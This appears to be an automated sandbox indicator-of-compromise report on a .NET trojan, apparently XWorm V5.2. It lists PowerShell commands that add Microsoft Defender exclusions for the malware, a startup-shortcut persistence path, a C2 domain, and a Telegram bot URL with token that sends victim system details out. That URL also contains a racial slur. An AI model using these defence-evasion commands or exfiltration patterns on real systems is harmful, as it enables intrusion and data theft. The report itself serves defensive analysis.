IOC Report
hWvc9C2A4e.exe

FilesProcessesURLsDomainsIPsRegistryMemdumps54321010010Label

Files

File Path
Type
Category
Malicious
Download
hWvc9C2A4e.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\Runtime userer.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2oyqfz0u.k2b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bptdd4q4.b0j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvanlzsd.rt2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecbucn0k.bk1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejqj11mx.x14.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1dtogse.i2a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lapiecy5.s25.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldmcaiyo.hwu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1tq1ohl.kbg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxsciu5n.kxi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkkqf4qr.wdy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5cd5msh.qhn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_td2odb2e.o4h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0gpsavs.yl1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpxo5xf0.jc4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_waox5bes.nnl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime userer.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 27 06:59:19 2025, mtime=Mon Jan 27 06:59:19 2025, atime=Mon Jan 27 06:59:19 2025, length=40960, window=hide
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\hWvc9C2A4e.exe
"C:\Users\user\Desktop\hWvc9C2A4e.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\hWvc9C2A4e.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'hWvc9C2A4e.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Runtime userer.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime userer.exe'
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
roblox.airdns.org
malicious
https://api.telegram.org/bot6871887156:AAH4uOJPQoZzoRxR8zOxOqMIkNDYQQvogdM/sendMessage?chat_id=-4513157803&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AAD526E1962D309B18790%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AXSO3T%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20NIGGALICKS
149.154.167.220
http://nuget.org/NuGet.exe
unknown
http://www.microsoft.coiops
unknown
https://api.telegram.org
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://api.telegram.org/bot6871887156:AAH4uOJPQoZzoRxR8zOxOqMIkNDYQQvogdM/sendMessage?chat_id=-4513
unknown
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
roblox.airdns.org
64.42.179.59
malicious
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
64.42.179.59
roblox.airdns.org
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\hWvc9C2A4e_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
F42000
unkown
page readonly
malicious
1B4F424A000
heap
page read and write
7FF7C0F40000
trusted library allocation
page read and write
21ED4F37000
trusted library allocation
page read and write
21EEB8B7000
heap
page read and write
7FF7C1028000
trusted library allocation
page read and write
191B5B0D000
heap
page read and write
7FF7C0D2C000
trusted library allocation
page execute and read and write
2236800C000
heap
page read and write
21ED1700000
heap
page read and write
7FF7C10D0000
trusted library allocation
page read and write
34E717E000
stack
page read and write
191B8E81000
trusted library allocation
page read and write
55E3D8E000
stack
page read and write
21ED4EED000
trusted library allocation
page read and write
1C154000
heap
page read and write
7FF7C0D80000
trusted library allocation
page read and write
191B7540000
heap
page execute and read and write
7FF7C0CD0000
trusted library allocation
page read and write
21EEB892000
heap
page read and write
7FF7C0FE3000
trusted library allocation
page read and write
7FF7C0FB0000
trusted library allocation
page read and write
191CFCA8000
heap
page read and write
14AC000
heap
page read and write
1BA8F000
stack
page read and write
191B7FE2000
trusted library allocation
page read and write
191B5B39000
heap
page read and write
7FF7C0FC0000
trusted library allocation
page read and write
7FF7C0E80000
trusted library allocation
page execute and read and write
7FF7C0EF0000
trusted library allocation
page read and write
7FF7C1004000
trusted library allocation
page read and write
1B4902FD000
trusted library allocation
page read and write
22368350000
heap
page read and write
7FF7C10E0000
trusted library allocation
page execute and read and write
1470000
trusted library allocation
page read and write
22368018000
heap
page read and write
7FF7C110D000
trusted library allocation
page read and write
7FF7C0F70000
trusted library allocation
page read and write
1B4902F7000
trusted library allocation
page read and write
7FF7C0CB0000
trusted library allocation
page read and write
7FF7C0E70000
trusted library allocation
page read and write
22350B49000
trusted library allocation
page read and write
1B4F1FB0000
heap
page read and write
1B4F22B0000
heap
page execute and read and write
7FF7C1015000
trusted library allocation
page read and write
55E29C3000
stack
page read and write
7FF7C0F60000
trusted library allocation
page read and write
7FF7C0F60000
trusted library allocation
page read and write
7FF7C111D000
trusted library allocation
page read and write
34E6DFA000
stack
page read and write
1BBFD000
stack
page read and write
565BB39000
stack
page read and write
55E32BE000
stack
page read and write
7FF7C0FD0000
trusted library allocation
page read and write
21EEB597000
heap
page execute and read and write
7FF7C0E92000
trusted library allocation
page read and write
7FF7C0E70000
trusted library allocation
page execute and read and write
2E5F1FD000
stack
page read and write
191B8955000
trusted library allocation
page read and write
21ED3D17000
trusted library allocation
page read and write
7FF7C1030000
trusted library allocation
page read and write
1B480C08000
trusted library allocation
page read and write
7DF4A0A10000
trusted library allocation
page execute and read and write
191C7591000
trusted library allocation
page read and write
7FF7C0FE0000
trusted library allocation
page read and write
7FF7C0DF0000
trusted library allocation
page execute and read and write
7FF7C0D6C000
trusted library allocation
page execute and read and write
2234DEB0000
heap
page read and write
1B490021000
trusted library allocation
page read and write
7FF7C0CC2000
trusted library allocation
page read and write
7FF7C0F80000
trusted library allocation
page read and write
55E3E0C000
stack
page read and write
7FF7C0E80000
trusted library allocation
page execute and read and write
21ED3E1D000
trusted library allocation
page read and write
21ED4116000
trusted library allocation
page read and write
565C907000
stack
page read and write
1810000
heap
page read and write
7FF7C0D60000
trusted library allocation
page read and write
7FF7C0E80000
trusted library allocation
page execute and read and write
1BAF3000
heap
page read and write
7FF7C0CC3000
trusted library allocation
page execute and read and write
22367E60000
heap
page execute and read and write
7FF7C0D70000
trusted library allocation
page read and write
21EE3131000
trusted library allocation
page read and write
7FF7C0F30000
trusted library allocation
page read and write
191CFCE2000
heap
page read and write
7FF7C0FA0000
trusted library allocation
page read and write
7FF7C110D000
trusted library allocation
page read and write
2E602CE000
stack
page read and write
191B87DE000
trusted library allocation
page read and write
191B5A70000
heap
page read and write
191C75A1000
trusted library allocation
page read and write
55E2F7D000
stack
page read and write
150F000
heap
page read and write
7FF7C0E98000
trusted library allocation
page read and write
7FF7C1022000
trusted library allocation
page read and write
34E72FE000
stack
page read and write
21EE340A000
trusted library allocation
page read and write
1B4F441C000
heap
page read and write
7FF7C0EA0000
trusted library allocation
page execute and read and write
1780000
heap
page read and write
191CFA41000
heap
page read and write
7DF44F630000
trusted library allocation
page execute and read and write
34E70F8000
stack
page read and write
565B6FE000
stack
page read and write
7FF7C0CDD000
trusted library allocation
page execute and read and write
22367CF0000
heap
page read and write
7FF7C0D60000
trusted library allocation
page read and write
22368169000
heap
page read and write
3151000
trusted library allocation
page read and write
565BAB7000
stack
page read and write
7FF7C0EC0000
trusted library allocation
page execute and read and write
191B5AB8000
heap
page read and write
1B490001000
trusted library allocation
page read and write
565CA0E000
stack
page read and write
1BA90000
heap
page execute and read and write
1B4F4215000
heap
page read and write
7FF7C0E70000
trusted library allocation
page execute and read and write
1B4811A5000
trusted library allocation
page read and write
7FF7C0F20000
trusted library allocation
page read and write
7FF7C0CBD000
trusted library allocation
page execute and read and write
1C78B000
stack
page read and write
1B4F2240000
trusted library allocation
page read and write
191B8196000
trusted library allocation
page read and write
7FF7C0FC0000
trusted library allocation
page read and write
21ED4142000
trusted library allocation
page read and write
7FF7C0E60000
trusted library allocation
page read and write
2236811A000
heap
page read and write
21EEB590000
heap
page execute and read and write
7FF7C1030000
trusted library allocation
page read and write
7FF7C0CD4000
trusted library allocation
page read and write
55E2DF9000
stack
page read and write
191CFCB0000
heap
page read and write
34E7EC9000
stack
page read and write
34E6F7D000
stack
page read and write
2235FB93000
trusted library allocation
page read and write
7FF7C0F50000
trusted library allocation
page read and write
1D38A000
stack
page read and write
7FF7C0EA0000
trusted library allocation
page execute and read and write
21EEB710000
heap
page read and write
191C7899000
trusted library allocation
page read and write
191CFA8F000
heap
page read and write
2235083F000
trusted library allocation
page read and write
7FF7C0D0C000
trusted library allocation
page execute and read and write
21EEB7E7000
heap
page read and write
1579000
heap
page read and write
21EEB450000
heap
page read and write
1B4F22B7000
heap
page execute and read and write
21ED1660000
trusted library section
page read and write
2235FBAB000
trusted library allocation
page read and write
7FF7C0D7C000
trusted library allocation
page execute and read and write
1440000
trusted library allocation
page read and write
191C7602000
trusted library allocation
page read and write
7FF7C0F30000
trusted library allocation
page read and write
1CBB4000
heap
page read and write
7DF4A0A20000
trusted library allocation
page execute and read and write
21EEB8B4000
heap
page read and write
7FF7C0D8C000
trusted library allocation
page execute and read and write
1D48C000
stack
page read and write
7FF7C10AA000
trusted library allocation
page read and write
191CFB88000
heap
page read and write
21ED3105000
heap
page read and write
7FF7C10D0000
trusted library allocation
page read and write
191B936C000
trusted library allocation
page read and write
55E313A000
stack
page read and write
34E7F4C000
stack
page read and write
30BE000
stack
page read and write
1CB90000
heap
page read and write
7FF7C1110000
trusted library allocation
page read and write
565B77F000
stack
page read and write
191B5B36000
heap
page read and write
7FF7C0D66000
trusted library allocation
page read and write
1B4F212D000
heap
page read and write
55E31B8000
stack
page read and write
191CFC80000
heap
page execute and read and write
191C75B1000
trusted library allocation
page read and write
7FF7C102C000
trusted library allocation
page read and write
1B480A51000
trusted library allocation
page read and write
565BC3F000
stack
page read and write
1B481DDC000
trusted library allocation
page read and write
7FF7C0F20000
trusted library allocation
page read and write
2234DCFD000
heap
page read and write
191B852F000
trusted library allocation
page read and write
191B88D0000
trusted library allocation
page read and write
2235167C000
trusted library allocation
page read and write
191B86B3000
trusted library allocation
page read and write
7FF7C0D60000
trusted library allocation
page read and write
1B4F4475000
heap
page read and write
21EEB46F000
heap
page read and write
191CFDA4000
heap
page read and write
21ED155A000
heap
page read and write
1B4F4720000
heap
page read and write
7FF7C10F0000
trusted library allocation
page read and write
22368010000
heap
page read and write
2235F913000
trusted library allocation
page read and write
1B4F423D000
heap
page read and write
55E3F8C000
stack
page read and write
22350C29000
trusted library allocation
page read and write
7FF7C0F70000
trusted library allocation
page read and write
191C7882000
trusted library allocation
page read and write
2E5EFFE000
stack
page read and write
7DF44F620000
trusted library allocation
page execute and read and write
21ED13F0000
heap
page read and write
1B4F2081000
heap
page read and write
34E7077000
stack
page read and write
1B4F2230000
heap
page readonly
1C18B000
heap
page read and write
1B481307000
trusted library allocation
page read and write
7FF7C10E0000
trusted library allocation
page execute and read and write
2234FC51000
trusted library allocation
page read and write
22367E90000
heap
page read and write
7FF7C0E90000
trusted library allocation
page execute and read and write
55E2FF9000
stack
page read and write
191CFCB4000
heap
page read and write
191CFCF3000
heap
page read and write
7FF7C0D66000
trusted library allocation
page read and write
13D0000
heap
page read and write
2E5F279000
stack
page read and write
2235F8A1000
trusted library allocation
page read and write
2234DDD0000
heap
page read and write
7FF7C1130000
trusted library allocation
page read and write
7FF7C1020000
trusted library allocation
page read and write
55E2CFE000
stack
page read and write
223516C6000
trusted library allocation
page read and write
55E3E8E000
stack
page read and write
55E323E000
stack
page read and write
7FF7C1009000
trusted library allocation
page read and write
7FF7C0EE0000
trusted library allocation
page read and write
2E601C9000
stack
page read and write
55E33BB000
stack
page read and write
7FF7C10B0000
trusted library allocation
page read and write
7FF7C0FB0000
trusted library allocation
page read and write
7FF7C0E50000
trusted library allocation
page read and write
21EEB861000
heap
page read and write
2234FD6D000
trusted library allocation
page read and write
21ED2F94000
heap
page read and write
191CFC70000
heap
page read and write
2E5F37A000
stack
page read and write
7FF7C0FF3000
trusted library allocation
page read and write
12F1000
stack
page read and write
223509C3000
trusted library allocation
page read and write
7FF7C101C000
trusted library allocation
page read and write
7FF7C1116000
trusted library allocation
page read and write
191C77D8000
trusted library allocation
page read and write
7FF7C0E6A000
trusted library allocation
page read and write
1B4F207D000
heap
page read and write
7FF7C0F40000
trusted library allocation
page read and write
191B5990000
heap
page read and write
7FF7C0CCB000
trusted library allocation
page read and write
191B5AF1000
heap
page read and write
191B73C0000
trusted library allocation
page read and write
7FF7C0F10000
trusted library allocation
page read and write
21ED35DD000
trusted library allocation
page read and write
7FF7C0EB4000
trusted library allocation
page read and write
22368042000
heap
page read and write
7FF7C0DD0000
trusted library allocation
page execute and read and write
7FF7C0EB0000
trusted library allocation
page read and write
1B4F2040000
heap
page read and write
7FF7C1120000
trusted library allocation
page read and write
22367FDB000
heap
page read and write
7FF7C0EC0000
trusted library allocation
page read and write
7FF7C0FE3000
trusted library allocation
page read and write
2235095E000
trusted library allocation
page read and write
21EEB536000
heap
page read and write
21ED16C0000
trusted library allocation
page read and write
7FF7C0EB2000
trusted library allocation
page read and write
191B5A90000
heap
page read and write
7FF7C0F00000
trusted library allocation
page read and write
1B48115A000
trusted library allocation
page read and write
1B48133A000
trusted library allocation
page read and write
2E6014E000
stack
page read and write
1B4902F0000
trusted library allocation
page read and write
7FF7C1020000
trusted library allocation
page read and write
21ED3D73000
trusted library allocation
page read and write
1B4F4404000
heap
page read and write
7FF7C0CD2000
trusted library allocation
page read and write
7FF7C0E6A000
trusted library allocation
page read and write
7FF7C0E71000
trusted library allocation
page read and write
7DF4E0FA0000
trusted library allocation
page execute and read and write
34E7E4D000
stack
page read and write
7FF7C10C0000
trusted library allocation
page read and write
7FF7C0EB8000
trusted library allocation
page read and write
7FF7C0ED0000
trusted library allocation
page read and write
21ED151F000
heap
page read and write
7FF7C1018000
trusted library allocation
page read and write
2235FB91000
trusted library allocation
page read and write
2E5F5FB000
stack
page read and write
1B481782000
trusted library allocation
page read and write
22351107000
trusted library allocation
page read and write
34E69FE000
stack
page read and write
7FF7C0CD0000
trusted library allocation
page read and write
21ED4A02000
trusted library allocation
page read and write
2E5F0FF000
stack
page read and write
7FF7C1110000
trusted library allocation
page read and write
7FF7C0FB0000
trusted library allocation
page read and write
7FF7C0D0C000
trusted library allocation
page execute and read and write
191B5AED000
heap
page read and write
191B73B0000
trusted library section
page read and write
21ED43B7000
trusted library allocation
page read and write
14A0000
heap
page read and write
1B4F20C5000
heap
page read and write
1740000
heap
page read and write
7FF7C0E7A000
trusted library allocation
page read and write
21EEB543000
heap
page read and write
7FF7C1012000
trusted library allocation
page read and write
1B4F1FF0000
heap
page read and write
7FF7C0CBD000
trusted library allocation
page execute and read and write
7FF7C1120000
trusted library allocation
page read and write
1B481006000
trusted library allocation
page read and write
7FF7C0CDB000
trusted library allocation
page read and write
1B4F44C1000
heap
page read and write
191CFEA0000
trusted library allocation
page read and write
1B4F42B0000
heap
page read and write
565BDBF000
stack
page read and write
1B4F4190000
heap
page read and write
2E5F176000
stack
page read and write
7FF7C103C000
trusted library allocation
page read and write
7FF7C0F40000
trusted library allocation
page read and write
1B480087000
trusted library allocation
page read and write
191B8D12000
trusted library allocation
page read and write
34E7DCC000
stack
page read and write
22350841000
trusted library allocation
page read and write
1B4F44F4000
heap
page read and write
F40000
unkown
page readonly
21ED3B63000
trusted library allocation
page read and write
21ED4418000
trusted library allocation
page read and write
7FF7C0F60000
trusted library allocation
page read and write
21EEBAA0000
heap
page read and write
22368004000
heap
page read and write
191CFDFC000
heap
page read and write
7FF7C1020000
trusted library allocation
page read and write
7FF7C0E61000
trusted library allocation
page read and write
1B4F3C90000
heap
page read and write
21EEB7F3000
heap
page read and write
7FF7C0CC4000
trusted library allocation
page read and write
21EEB4C6000
heap
page read and write
1C29C000
stack
page read and write
1B481E01000
trusted library allocation
page read and write
55E400E000
stack
page read and write
7FF7C0DB6000
trusted library allocation
page execute and read and write
21ED3100000
heap
page read and write
223508A5000
trusted library allocation
page read and write
7FF7C0EA4000
trusted library allocation
page read and write
7FF7C0CB3000
trusted library allocation
page execute and read and write
21ED15D0000
heap
page read and write
7FF7C0D76000
trusted library allocation
page read and write
7FF437C30000
trusted library allocation
page execute and read and write
22368170000
heap
page read and write
7FF7C0EA8000
trusted library allocation
page read and write
21ED4A61000
trusted library allocation
page read and write
1D28E000
stack
page read and write
55E2EF9000
stack
page read and write
7FF7C101A000
trusted library allocation
page read and write
7FF7C0EA0000
trusted library allocation
page execute and read and write
7FF7C0E90000
trusted library allocation
page execute and read and write
7FF7C0E98000
trusted library allocation
page read and write
2235060E000
trusted library allocation
page read and write
7FF7C1014000
trusted library allocation
page read and write
7FF7C0CC0000
trusted library allocation
page read and write
191B77BA000
trusted library allocation
page read and write
21ED4893000
trusted library allocation
page read and write
7FF7C0CE0000
trusted library allocation
page read and write
2234F926000
trusted library allocation
page read and write
223502F2000
trusted library allocation
page read and write
2236804F000
heap
page read and write
1B480BF8000
trusted library allocation
page read and write
21EE340C000
trusted library allocation
page read and write
1C0A0000
heap
page read and write
191C75C1000
trusted library allocation
page read and write
191CFB7F000
heap
page read and write
7FF7C0E62000
trusted library allocation
page read and write
21ED4979000
trusted library allocation
page read and write
191B74C0000
heap
page execute and read and write
1B4902FF000
trusted library allocation
page read and write
21ED15AC000
heap
page read and write
7FF7C0D1C000
trusted library allocation
page execute and read and write
223504A6000
trusted library allocation
page read and write
30F0000
heap
page read and write
7FF7C0F90000
trusted library allocation
page read and write
21ED1519000
heap
page read and write
7DF4E0FB0000
trusted library allocation
page execute and read and write
7FF7C0ED0000
trusted library allocation
page read and write
2234F7C0000
heap
page execute and read and write
FE0000
heap
page read and write
7FF7C1050000
trusted library allocation
page read and write
1B4F43C3000
heap
page read and write
7FF7C0CD0000
trusted library allocation
page read and write
1B4813C5000
trusted library allocation
page read and write
21EE3111000
trusted library allocation
page read and write
2E5EF7E000
stack
page read and write
1B4F3C95000
heap
page read and write
2234F890000
heap
page read and write
191CFCAC000
heap
page read and write
7FF7C0E92000
trusted library allocation
page read and write
191B73E0000
trusted library allocation
page read and write
7FF7C0F10000
trusted library allocation
page read and write
191B760C000
trusted library allocation
page read and write
21ED4322000
trusted library allocation
page read and write
22367D41000
heap
page read and write
7FF7C1020000
trusted library allocation
page read and write
7FF7C0EA2000
trusted library allocation
page read and write
2235FB8C000
trusted library allocation
page read and write
7FF7C0F80000
trusted library allocation
page read and write
7FF7C0CD4000
trusted library allocation
page read and write
1B130000
trusted library allocation
page read and write
191CFCBC000
heap
page read and write
7FF7C1120000
trusted library allocation
page read and write
191B7400000
trusted library allocation
page read and write
565C88C000
stack
page read and write
2234DD45000
heap
page read and write
7FF7C0CB4000
trusted library allocation
page read and write
7FF7C0DA6000
trusted library allocation
page execute and read and write
2235112E000
trusted library allocation
page read and write
1BD9E000
stack
page read and write
21ED1510000
heap
page read and write
21ED3E8F000
trusted library allocation
page read and write
21ED4F12000
trusted library allocation
page read and write
22350AB4000
trusted library allocation
page read and write
7FF7C0EE0000
trusted library allocation
page read and write
21EEB7FB000
heap
page read and write
2236809F000
heap
page read and write
7FF7C0CB4000
trusted library allocation
page read and write
2235FB99000
trusted library allocation
page read and write
21EEB4AF000
heap
page read and write
7FF7C0F30000
trusted library allocation
page read and write
7FF7C0E52000
trusted library allocation
page read and write
2234DD05000
heap
page read and write
7FF7C0F50000
trusted library allocation
page read and write
191B8898000
trusted library allocation
page read and write
3101000
trusted library allocation
page read and write
21EEB462000
heap
page read and write
191C787B000
trusted library allocation
page read and write
21ED155D000
heap
page read and write
191B93B6000
trusted library allocation
page read and write
1B4F4274000
heap
page read and write
21ED3D0F000
trusted library allocation
page read and write
2234F8A1000
trusted library allocation
page read and write
7DF44F610000
trusted library allocation
page execute and read and write
7FF7C0CD3000
trusted library allocation
page execute and read and write
223508D1000
trusted library allocation
page read and write
34E737C000
stack
page read and write
34E6D7E000
stack
page read and write
21EEB7B5000
heap
page read and write
21ED15F0000
heap
page read and write
7FF7C0FC0000
trusted library allocation
page read and write
2236815A000
heap
page read and write
7FF7C10F0000
trusted library allocation
page read and write
34E69B3000
stack
page read and write
55E2C7D000
stack
page read and write
7FF7C0CC2000
trusted library allocation
page read and write
191B855D000
trusted library allocation
page read and write
7FF7C1029000
trusted library allocation
page read and write
7FF7C0E61000
trusted library allocation
page read and write
22367EB0000
heap
page read and write
2E5FFCE000
stack
page read and write
7FF7C1019000
trusted library allocation
page read and write
21EEB570000
trusted library allocation
page read and write
7FF7C101C000
trusted library allocation
page read and write
7FF7C0ED0000
trusted library allocation
page read and write
1B4810BD000
trusted library allocation
page read and write
191B73F0000
heap
page readonly
7FF7C1110000
trusted library allocation
page read and write
7FF7C1130000
trusted library allocation
page read and write
191B7460000
trusted library allocation
page read and write
7FF7C0E60000
trusted library allocation
page read and write
7FF7C0CC0000
trusted library allocation
page read and write
22367FB5000
heap
page read and write
2236816B000
heap
page read and write
21EEB4AB000
heap
page read and write
1B4F4506000
heap
page read and write
14A6000
heap
page read and write
2235F8C1000
trusted library allocation
page read and write
2234F700000
trusted library allocation
page read and write
7FF7C10F0000
trusted library allocation
page execute and read and write
1B4812A5000
trusted library allocation
page read and write
191C7880000
trusted library allocation
page read and write
565C98C000
stack
page read and write
7FF7C1040000
trusted library allocation
page read and write
191B81C6000
trusted library allocation
page read and write
7FF7C1024000
trusted library allocation
page read and write
1B481385000
trusted library allocation
page read and write
2234DDA7000
heap
page read and write
7FF7C10F0000
trusted library allocation
page read and write
7FF7C1010000
trusted library allocation
page read and write
F40000
unkown
page readonly
1B4F43E4000
heap
page read and write
7FF7C0D66000
trusted library allocation
page read and write
2234F800000
trusted library allocation
page read and write
7FF7C0E50000
trusted library allocation
page read and write
21ED41D0000
trusted library allocation
page read and write
1B4F22C0000
trusted library allocation
page read and write
2235F8D1000
trusted library allocation
page read and write
21ED3111000
trusted library allocation
page read and write
1B4F41D9000
heap
page read and write
55E303F000
stack
page read and write
21EEB4B5000
heap
page read and write
191B7591000
trusted library allocation
page read and write
565B87E000
stack
page read and write
191B85F5000
trusted library allocation
page read and write
7FF7C0FE0000
trusted library allocation
page read and write
7FF7C0FA0000
trusted library allocation
page read and write
2234FACA000
trusted library allocation
page read and write
191B7430000
trusted library allocation
page read and write
7FF7C0CB4000
trusted library allocation
page read and write
7FF7C1060000
trusted library allocation
page read and write
1B4F3BA0000
heap
page read and write
21ED4F32000
trusted library allocation
page read and write
191B8188000
trusted library allocation
page read and write
1B4F4455000
heap
page read and write
7FF7C0CB0000
trusted library allocation
page read and write
1B4902F5000
trusted library allocation
page read and write
7FF7C0E94000
trusted library allocation
page read and write
1C595000
stack
page read and write
21ED1670000
trusted library allocation
page read and write
1C98F000
stack
page read and write
7FF7C10C0000
trusted library allocation
page read and write
7FF7C1009000
trusted library allocation
page read and write
191B7A5D000
trusted library allocation
page read and write
7FF7C1003000
trusted library allocation
page read and write
7FF7C0FA0000
trusted library allocation
page read and write
191C7A41000
trusted library allocation
page read and write
191B8304000
trusted library allocation
page read and write
7FF7C0F10000
trusted library allocation
page read and write
21ED14E3000
heap
page read and write
7FF7C10C0000
trusted library allocation
page read and write
1455000
heap
page read and write
7FF7C0E81000
trusted library allocation
page read and write
7FF7C1000000
trusted library allocation
page read and write
191B5D60000
heap
page read and write
7FF7C0F90000
trusted library allocation
page read and write
7FF7C1100000
trusted library allocation
page read and write
21EE3402000
trusted library allocation
page read and write
7FF7C0FE0000
trusted library allocation
page read and write
7FF7C0D0C000
trusted library allocation
page execute and read and write
1B4F443E000
heap
page read and write
1C09E000
stack
page read and write
565BCBE000
stack
page read and write
191CFE39000
heap
page read and write
22368008000
heap
page read and write
7FF7C0F00000
trusted library allocation
page read and write
191CFCB8000
heap
page read and write
55E2D7E000
stack
page read and write
7FF7C0EF0000
trusted library allocation
page read and write
191B8837000
trusted library allocation
page read and write
7FF7C1130000
trusted library allocation
page read and write
21ED44D3000
trusted library allocation
page read and write
7FF7C10C0000
trusted library allocation
page read and write
1CA8D000
stack
page read and write
7FF7C0F70000
trusted library allocation
page read and write
22367FB0000
heap
page read and write
191B8E1E000
trusted library allocation
page read and write
22367E87000
heap
page execute and read and write
2E5F4FE000
stack
page read and write
7FF7C1018000
trusted library allocation
page read and write
1BADE000
stack
page read and write
21EEB4BB000
heap
page read and write
7FF7C0F50000
trusted library allocation
page read and write
2E5EE73000
stack
page read and write
7FF7C1110000
trusted library allocation
page read and write
565B8F9000
stack
page read and write
2234FCD0000
trusted library allocation
page read and write
55E2E7E000
stack
page read and write
2234DF20000
heap
